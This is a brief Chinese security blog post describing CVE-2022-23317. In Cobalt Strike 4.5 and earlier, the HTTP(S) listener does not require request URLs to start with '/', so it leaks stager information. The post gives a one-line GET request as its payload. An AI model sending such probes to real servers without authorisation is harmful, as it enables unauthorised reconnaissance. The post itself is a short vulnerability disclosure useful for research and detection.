Headline
CVE-2022-23317: CS新特征 | DongHuangT1's Blog
CobaltStrike <=4.5 HTTP(S) listener does not determine whether the request URL begins with "/", and attackers can obtain relevant information by specifying the URL.
Vuln
安全
发布日期: 2022-01-10
文章字数: 69
阅读时长: 1分
阅读次数:
基本描述
CobaltStrike的HTTP(s)监听器对请求URL未进行”/“开头验证,攻击者可通过指定URL获取相关信息。
有效载荷
GET stager HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0
测试过程
影响范围
CobaltStrike <= 4.5
文章作者: DongHuangT1
文章链接: https://DongHuangT1.com/writings/Stager/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY-NC 4.0 许可协议。转载请注明来源 DongHuangT1 !
评论
本篇
CS新特征
CobaltStrike是一款基于Java编写的全平台多方协同后渗透攻击框架,几乎覆盖了APT攻击链中所需要用到的各个技术环节。
2022-01-10 安全
Vuln
下一篇
信息收集
╔═══════════════╗
║ “复制粘贴” 之信息收集 ║
╚═══════════════╝
2021-03-10 安全
RedTeam